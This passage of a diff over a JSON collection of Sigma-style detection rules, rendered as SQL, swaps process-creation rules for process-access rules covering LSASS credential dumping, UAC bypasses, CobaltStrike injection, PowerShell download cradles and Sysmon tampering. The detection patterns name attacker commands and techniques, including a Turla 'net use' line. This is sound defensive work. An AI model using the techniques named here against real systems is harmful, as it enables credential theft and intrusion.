LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\app-%' ESCAPE '\\' AND TargetImage LIKE '%\\\\Yammer.exe' ESCAPE '\\' AND GrantedAccess = '0x1000') OR (Provider_Name = 
'Microsoft-Windows-Kernel-Audit-API-Calls') OR (TargetImage LIKE '%\\\\Evernote\\\\Evernote.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_svchost_execution_with_no_cli_flags.yml" + "filename": "proc_access_win_direct_syscall_ntopenprocess.yml" }, { - "title": "PUA - Nimgrab Execution", - "id": "74a12f18-505c-4114-8d0b-8448dd5485c6", - "status": "experimental", - "description": "Detects the usage of nimgrab, a tool bundled with the Nim programming framework and used for downloading files.", - "author": "frack113", + "title": "UAC Bypass Using WOW64 Logger DLL Hijack", + "id": "4f6c43e2-f989-4ea5-bcd8-843b49a0317c", + "status": "test", + "description": "Detects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe 30)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Legitimate use of Nim on a developer systems" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\nimgrab.exe' ESCAPE '\\' OR (Hashes LIKE '%MD5=2DD44C3C29D667F5C0EF5F9D7C7FFB8B%' ESCAPE '\\' OR Hashes LIKE '%SHA256=F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=C07FDDD21D123EA9B3A08EEF44AAAC45%' ESCAPE '\\') OR md5 = '2DD44C3C29D667F5C0EF5F9D7C7FFB8B' OR sha256 = 'F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559' OR Imphash = 'C07FDDD21D123EA9B3A08EEF44AAAC45'))" - ], - "filename": "proc_creation_win_pua_nimgrab.yml" - }, - { - "title": "PowerShell Web Download", - "id": "6e897651-f157-4d8f-aaeb-df8151488385", - "status": "experimental", - "description": "Detects suspicious ways to download files or content using PowerShell", - "author": "Florian Roth (Nextron Systems)", - "falsepositives": [ - "Scripts or tools that download files" - ], - "level": 
"medium", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%.DownloadString(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest %' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (SourceImage LIKE '%:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' AND GrantedAccess = '0x1fffff' AND CallTrace LIKE 'UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_download_cradles.yml" + "filename": "proc_access_win_uac_bypass_wow64_logger.yml" }, { - "title": "DLL Execution via Rasautou.exe", - "id": "cd3d1298-eb3b-476c-ac67-12847de55813", + "title": "CobaltStrike BOF Injection Pattern", + "id": "09706624-b7f6-455d-9d02-adee024cee1d", "status": "test", - "description": "Detects using Rasautou.exe for loading arbitrary .DLL specified in -d option and executes the export specified in -p.", - "author": "Julia Fomina, oscd.community", + "description": "Detects a typical pattern of a CobaltStrike BOF which inject into other processes", + "author": "Christian Burkard (Nextron Systems)", "tags": [ + "attack.execution", + "attack.t1106", "attack.defense_evasion", - "attack.t1218" + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rasautou.exe' ESCAPE '\\' OR OriginalFileName = 'rasdlui.exe') AND (CommandLine LIKE '% -d %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (CallTrace REGEXP '^C:\\\\Windows\\\\SYSTEM32\\\\ntdll\\.dll\\+[a-z0-9]{4,6}\\|C:\\\\Windows\\\\System32\\\\KERNELBASE\\.dll\\+[a-z0-9]{4,6}\\|UNKNOWN\\([A-Z0-9]{16}\\)$' AND GrantedAccess IN ('0x1028', '0x1fffff'))" ], - "filename": "proc_creation_win_lolbin_rasautou_dll_execution.yml" + "filename": 
"proc_access_win_cobaltstrike_bof_injection_pattern.yml" }, { - "title": "Renamed MegaSync Execution", - "id": "643bdcac-8b82-49f4-9fd9-25a90b929f3b", + "title": "Load Undocumented Autoelevated COM Interface", + "id": "fb3722e4-1a06-46b6-b772-253e2e7db933", "status": "test", - "description": "Detects the execution of a renamed MegaSync.exe as seen used by ransomware families like Nefilim, Sodinokibi, Pysa, and Conti.", - "author": "Sittikorn S", + "description": "COM interface (EditionUpgradeManager) that is not used by standard executables.", + "author": "oscd.community, Dmitry Uchakin", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Software that illegally integrates MegaSync in a renamed form", - "Administrators that have renamed MegaSync" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'megasync.exe' AND NOT (NewProcessName LIKE '%\\\\megasync.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE CallTrace LIKE '%editionupgrademanagerobj.dll%' ESCAPE '\\'" ], - "filename": "proc_creation_win_renamed_megasync.yml" + "filename": "proc_access_win_load_undocumented_autoelevated_com_interface.yml" }, { - "title": "Application Whitelisting Bypass via Bginfo", - "id": "aaf46cdc-934e-4284-b329-34aa701e3771", - "status": "test", - "description": "Execute VBscript code that is referenced within the *.bgi file.", - "author": "Beyu Denis, oscd.community", + "title": "Rare GrantedAccess Flags on LSASS Access", + "id": "678dfc63-fefb-47a5-a04c-26bcf8cc9f65", + "status": "experimental", + "description": "Detects process access to LSASS memory with suspicious access flags 0x410 and 0x01410 (spin-off of similar rule)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.defense_evasion", - "attack.t1218", - "attack.t1202" + "attack.credential_access", + 
"attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "Legitimate software accessing LSASS process for legitimate reason" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\bginfo.exe' ESCAPE '\\' AND CommandLine LIKE '%/popup%' ESCAPE '\\' AND CommandLine LIKE '%/nolicprompt%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess LIKE '%10' ESCAPE '\\') AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Malwarebytes\\\\Anti-Malware\\\\MBAMService.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\System32\\\\perfmon.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Common Files\\\\McAfee\\\\MMSSHost\\\\MMSSHOST.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\GamingServices.exe' ESCAPE '\\') OR ((SourceImage LIKE '%\\\\PROCEXP64.EXE' ESCAPE '\\' OR SourceImage LIKE '%\\\\PROCEXP.EXE' ESCAPE '\\')) OR (SourceImage LIKE 
'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND SourceImage LIKE '%Antivirus%' ESCAPE '\\') OR ((SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\')) OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vs\\_bootstrapper\\_%' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\%' ESCAPE '\\')) OR (SourceCommandLine LIKE 'C:\\\\WINDOWS\\\\system32\\\\wermgr.exe -upload' ESCAPE '\\') OR (SourceImage LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\software\\_reporter\\_tool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\DropboxUpdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\JetBrains\\\\Toolbox\\\\bin\\\\jetbrains-toolbox.exe' ESCAPE '\\')) OR (SourceImage LIKE '%\\\\xampp-control.exe' ESCAPE '\\' AND GrantedAccess = '0x410') OR (SourceImage LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x10'))))" ], - "filename": "proc_creation_win_lolbin_bginfo.yml" + "filename": "proc_access_win_rare_proc_access_lsass.yml" }, { - "title": "Suspicious Extrac32 Alternate Data Stream Execution", - "id": 
"4b13db67-0c45-40f1-aba8-66a1a7198a1e", + "title": "Credential Dumping by Pypykatz", + "id": "7186e989-4ed7-4f4e-a656-4674b9e3e48b", "status": "test", - "description": "Extract data from cab file and hide it in an alternate data stream", - "author": "frack113", + "description": "Detects LSASS process access by pypykatz for credential dumping.", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%extrac32.exe%' ESCAPE '\\' AND CommandLine LIKE '%.cab%' ESCAPE '\\' AND CommandLine REGEXP ':[^\\\\]')" + "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+%' ESCAPE '\\' AND CallTrace LIKE '%libffi-7.dll%' ESCAPE '\\' AND CallTrace LIKE '%\\_ctypes.pyd+%' ESCAPE '\\' AND CallTrace LIKE '%python3%.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" ], - "filename": "proc_creation_win_lolbin_extrac32_ads.yml" + "filename": "proc_access_win_pypykatz_cred_dump_lsass_access.yml" }, { - "title": "Turla Group Lateral Movement", - "id": "c601f20d-570a-4cde-a7d6-e17f99cb8e7f", + "title": "LSASS Memory Access by Tool Named Dump", + "id": "9bd012ee-0dff-44d7-84a0-aa698cfd87a3", "status": "test", - "description": "Detects automated lateral movement by Turla group", - "author": "Markus Neis", + "description": "Detects a possible process memory dump based on a keyword in the file name of the accessing process", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.g0010", - "attack.execution", - "attack.t1059", - "attack.lateral_movement", - "attack.t1021.002", - "attack.discovery", - "attack.t1083", - "attack.t1135" + "attack.credential_access", + 
"attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "Rare programs that contain the word dump in their name and access lsass" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE 'net use \\\\\\\\\\%DomainController\\%\\\\C$ \"P@ssw0rd\" %' ESCAPE '\\' OR CommandLine LIKE 'dir c:\\\\%.doc% /s' ESCAPE '\\' OR CommandLine LIKE 'dir \\%TEMP\\%\\\\%.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE '%dump%' ESCAPE '\\' AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_turla_commands_critical.yml" + "filename": "proc_access_win_lsass_memdump_indicators.yml" }, { - "title": "Allow Service Access Using Security Descriptor Tampering Via Sc.EXE", - "id": "6c8fbee5-dee8-49bc-851d-c3142d02aa47", + "title": "Potential NT API Stub Patching", + "id": 
"b916cba1-b38a-42da-9223-17114d846fd6", "status": "experimental", - "description": "Detects suspicious DACL modifications to allow access to a service from a suspicious trustee. This can be used to override access restrictions set by previous ACLs.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential NT API stub patching as seen used by the project PatchingAPI", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1543.003" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%A;%' ESCAPE '\\') AND (CommandLine LIKE '%;IU%' ESCAPE '\\' OR CommandLine LIKE '%;SU%' ESCAPE '\\' OR CommandLine LIKE '%;BA%' ESCAPE '\\' OR CommandLine LIKE '%;SY%' ESCAPE '\\' OR CommandLine LIKE '%;WD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((GrantedAccess = '0x1FFFFF' AND CallTrace LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%)' ESCAPE '\\') AND NOT (((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage 
LIKE '%\\\\AppData\\\\Local\\\\GitHubDesktop\\\\app-%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\GitHubDesktop.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\resources\\\\app\\\\git\\\\usr\\\\bin\\\\sh.exe' ESCAPE '\\') AND TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\GitHubDesktop\\\\app-%' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v%' ESCAPE '\\') AND SourceImage LIKE '%\\\\NGenTask.exe' ESCAPE '\\' AND (TargetImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v%' ESCAPE '\\')) OR ((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\taskhost.exe' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v%' ESCAPE '\\') AND TargetImage LIKE '%\\\\NGenTask.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\WINDOWS\\\\SysWOW64\\\\regsvr32.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sc_sdset_allow_service_changes.yml" + "filename": 
"proc_access_win_invoke_patchingapi.yml" }, { - "title": "Suspicious Remote Child Process From Outlook", - "id": "e212d415-0e93-435f-9e1a-f29005bb4723", - "status": "test", - "description": "Detects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares).", - "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", + "title": "SysmonEnte Usage", + "id": "d29ada0f-af45-4f27-8f32-f7b77c3dbc4e", + "status": "experimental", + "description": "Detects the use of SysmonEnte, a tool to attack the integrity of Sysmon", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059", - "attack.t1202" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' AND NewProcessName LIKE '\\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE (((TargetImage LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' AND GrantedAccess = '0x1400') AND NOT (((SourceImage LIKE 'C:\\\\Program Files%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\'))) OR CallTrace = 'Ente')" ], - "filename": "proc_creation_win_office_outlook_susp_child_processes_remote.yml" + "filename": "proc_access_win_hack_sysmonente.yml" }, { - "title": "UAC Bypass via Windows Firewall Snap-In Hijack", - "id": "e52cb31c-10ed-4aea-bcb7-593c9f4a315b", - "status": "experimental", - "description": "Detects attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in", - "author": "Tim Rauch", + "title": "Malware Shellcode in Verclsid Target Process", + "id": "b7967e22-3d7e-409b-9ed5-cdae3f9243a1", + 
"status": "test", + "description": "Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro", + "author": "John Lambert (tech), Florian Roth (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1548" + "attack.t1055" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%WF.msc%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\verclsid.exe' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF') AND ((CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%VBE7.DLL%' ESCAPE '\\') OR (SourceImage LIKE '%\\\\Microsoft Office\\\\%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_hijacking_firwall_snap_in.yml" + "filename": "proc_access_win_malware_verclsid_shellcode.yml" }, { - "title": "Invoke-Obfuscation Via Stdin", - "id": "9c14c9fa-1a63-4a64-8e57-d19280559490", - "status": "test", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Suspicious GrantedAccess Flags on LSASS Access", + "id": "a18dd26b-6450-46de-8c91-9659150cf088", + "status": "experimental", + "description": "Detects process access to LSASS memory with suspicious access flags", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "Legitimate software such as AV and EDR" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%set%' ESCAPE '\\' AND 
CommandLine LIKE '%&&%' ESCAPE '\\' AND (CommandLine LIKE '%environment%' ESCAPE '\\' OR CommandLine LIKE '%invoke%' ESCAPE '\\' OR CommandLine LIKE '%input%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\')) AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Malwarebytes\\\\Anti-Malware\\\\MBAMService.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Users\\\\%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 
'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\System32\\\\perfmon.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\MRT.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Cisco\\\\Cisco AnyConnect Secure Mobility Client\\\\vpnagent.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Cisco\\\\Cisco AnyConnect Secure Mobility Client\\\\vpnagent.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (CallTrace LIKE '%|C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\{%' ESCAPE '\\' AND CallTrace LIKE '%}\\\\mpengine.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MsMpEng.exe' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND SourceImage LIKE '%Antivirus%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\MRT.exe' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Common Files\\\\McAfee\\\\MMSSHost\\\\MMSSHOST.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE 